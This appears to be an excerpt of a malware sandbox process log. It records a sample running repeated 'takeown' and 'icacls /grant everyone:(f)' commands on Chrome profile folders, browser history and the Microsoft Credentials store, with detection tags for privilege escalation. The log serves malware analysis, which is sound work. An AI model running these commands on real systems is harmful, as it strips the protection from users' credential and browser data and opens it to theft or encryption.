C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64 && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList643⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\UrlParamClassifications && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\UrlParamClassifications /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\UrlParamClassifications3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData && icacls C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\History && icacls C:\Users\Admin\AppData\Local\History /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\History3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\History /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\History\History.IE5 && icacls C:\Users\Admin\AppData\Local\History\History.IE5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\History\History.IE53⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\History\History.IE5 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\History\History.IE5\MSHist012024100120241002 && icacls C:\Users\Admin\AppData\Local\History\History.IE5\MSHist012024100120241002 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\History\History.IE5\MSHist0120241001202410023⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\History\History.IE5\MSHist012024100120241002 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\History\Low && icacls C:\Users\Admin\AppData\Local\History\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\History\Low3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\History\Low /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft && icacls C:\Users\Admin\AppData\Local\Microsoft /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Credentials && icacls C:\Users\Admin\AppData\Local\Microsoft\Credentials /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Credentials3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Credentials /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds && icacls C:\Users\Admin\AppData\Local\Microsoft\Feeds /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Feeds3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Microsoft\Feeds /grant everyone:(f)3⤵
-
-
-
